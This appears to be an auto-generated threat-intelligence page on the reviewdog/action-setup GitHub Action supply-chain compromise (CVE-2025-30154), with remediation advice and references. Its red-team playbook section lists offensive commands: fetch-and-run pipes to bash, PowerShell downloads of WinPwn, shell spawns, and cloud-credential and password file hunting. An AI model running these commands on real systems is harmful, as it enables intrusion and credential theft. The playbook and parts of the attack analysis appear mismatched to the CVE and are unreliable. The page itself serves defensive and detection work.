CVE-2025-30154
Overview
The vulnerability is a supply chain compromise involving the reviewdog/action-setup GitHub Action, where malicious code was injected into the version v1 of the action. The root cause is unauthorized modification of the action's source code repository, resulting in the inclusion of code that exfiltrates secrets. This affects the reviewdog/action-setup component and all other reviewdog GitHub Actions that depend on reviewdog/action-setup@v1, regardless of version pinning.
Vulnerability Description
reviewdog/action-setup is a GitHub action that installs reviewdog. reviewdog/action-setup@v1 was compromised March 11, 2025, between 18:42 and 20:31 UTC, with malicious code added that dumps exposed secrets to Github Actions Workflow Logs. Other reviewdog actions that use `reviewdog/action-setup@v1` that would also be compromised, regardless of version or pinning method, are reviewdog/action-shellcheck, reviewdog/action-composite-template, reviewdog/action-staticcheck, reviewdog/action-ast-grep, and reviewdog/action-typos.
Impact
An attacker exploiting this vulnerability can extract sensitive secrets such as tokens, credentials, or environment variables exposed in GitHub Actions workflows without requiring authentication or user interaction. This can lead to unauthorized access to downstream systems, data leakage, or further compromise of the CI/CD environment. Organizations using the affected reviewdog actions may suffer from credential exposure, enabling lateral movement or data breaches within their development pipelines and cloud infrastructure.
Solution
Users must immediately stop using reviewdog/action-setup@v1 and all dependent reviewdog actions that reference this version. The vendor advisory GHSA-qmg3-hpqr-gqvc on GitHub provides detailed remediation steps, including upgrading to patched versions that do not include the compromised code. Reviewdog's official repository and advisory pages contain updated commits and instructions to replace the affected action versions. Organizations should audit their workflows for the usage of reviewdog actions pinned to v1 and update or remove them accordingly.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability associated with the reviewdog GitHub action stems from a compromise that allowed malicious code to be injected into the action responsible for installing reviewdog. This incident occurred within a specific time frame, during which the integrity of the action was undermined, resulting in the exposure of sensitive information. The malicious code was designed to dump secrets from GitHub Actions Workflow Logs, which could include API keys, access tokens, and other confidential data that should remain secure. The affected action, reviewdog/action-setup@v1, not only compromised itself but also impacted several other actions that relied on it, thereby amplifying the potential for data leakage across multiple projects.
Attack vectors for this vulnerability are particularly concerning due to the nature of GitHub Actions, which are widely used for continuous integration and deployment. An attacker could exploit this vulnerability by crafting a malicious workflow that utilizes the compromised action. Once executed, the malicious code would run in the context of the repository, gaining access to any secrets stored in the GitHub environment. This scenario is exacerbated by the fact that many organizations may not regularly audit their dependencies or may rely on version pinning, which in this case would not prevent exposure since the compromised action was used across various versions and implementations.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on GitHub for their development workflows. The exposure of sensitive information can lead to unauthorized access to systems, data breaches, and potential financial losses. Furthermore, the reputational damage associated with such incidents can have long-lasting effects on trust and credibility with clients and stakeholders. Businesses that fail to address this vulnerability may find themselves facing regulatory scrutiny, especially if the exposed data includes personally identifiable information (PII) or other regulated data types.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regular audits of GitHub Actions and their dependencies are essential to ensure that only trusted and verified actions are utilized. Employing automated tools to scan for known vulnerabilities in dependencies can help identify potential risks before they are exploited. Additionally, organizations should consider implementing environment variable management solutions that limit the exposure of sensitive data in logs, such as masking secrets or using encrypted storage for sensitive information. Educating development teams about secure coding practices and the importance of monitoring third-party actions can further enhance security posture.
In conclusion, the compromise of the reviewdog GitHub action highlights the critical need for vigilance in managing third-party dependencies within software development environments. The potential for data exposure through malicious code injection underscores the importance of robust security practices, including regular audits, automated vulnerability scanning, and effective secrets management. Organizations must remain proactive in addressing such vulnerabilities to safeguard their sensitive information and maintain the integrity of their development processes.
CSURFACE threat intelligence has identified a marked escalation in the Exploit Prediction Scoring System (EPSS) score for CVE-2025-30154, reflecting a significant increase in the likelihood of exploitation. The EPSS score surged by over 180%, positioning this vulnerability near the top percentile of predicted exploitability. This shift underscores growing adversary interest or improved capability to leverage the compromised reviewdog GitHub action for secret exfiltration. Although no new exploit techniques or ransomware associations have been detected, the elevated EPSS score signals heightened risk to organizations relying on reviewdog actions, especially given the widespread use of these tools in continuous integration pipelines. Defenders should interpret this development as an indication that threat actors may be actively preparing or conducting attacks, increasing the urgency for vigilant monitoring and response. Consequently, the threat level for CVE-2025-30154 has escalated from a high concern to a critical priority within the supply chain compromise landscape.
Affected Products (6)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Reviewdog | Action-Ast-Grep | All |
cpe:2.3:a:reviewdog:action-ast-grep:*:*:*:*:*:*:*:*
|
|
|
Reviewdog | Action-Composite-Template | All |
cpe:2.3:a:reviewdog:action-composite-template:*:*:*:*:*:*:*:*
|
|
|
Reviewdog | Action-Setup | 1 |
cpe:2.3:a:reviewdog:action-setup:1:*:*:*:*:*:*:*
|
|
|
Reviewdog | Action-Shellcheck | All |
cpe:2.3:a:reviewdog:action-shellcheck:*:*:*:*:*:*:*:*
|
|
|
Reviewdog | Action-Staticcheck | All |
cpe:2.3:a:reviewdog:action-staticcheck:*:*:*:*:*:*:*:*
|
|
|
Reviewdog | Action-Typos | All |
cpe:2.3:a:reviewdog:action-typos:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (7)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-442 | Infected Software |
33%
|
Medium | High | |
| CAPEC-636 | Hiding Malicious Data or Code within Files |
33%
|
— | High | |
| CAPEC-448 | Embed Virus into DLL |
30%
|
Medium | High |
Red Team Playbook
45 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach --rm -i -- bash -lc "mkdir -p /tmp/test && cd /tmp/test && npm init -y >/dev/null 2>&1 && echo '--- package.json before install ---' && cat package.json && npm install #{package_name} --no-audit --no-fund --no-package-lock && echo '--- package.json after install ---' && cat package.json"
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-30154 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/reviewdog/reviewdog/security/advisories/GHSA-qmg3-hpqr-gqvc |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/reviewdog/reviewdog/issues/2079 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/reviewdog/action-setup/commit/3f401fe1d58fe77e10d665ab713057375e39b887 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/reviewdog/action-setup/commit/f0d342d24037bb11d26b9bd8496e0808ba32e9ec |
| wiz.io |
GitHub CVE
x_refsource_MISC
|
https://www.wiz.io/blog/new-github-action-supply-chain-attack-reviewdog-action-setup |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-30154 |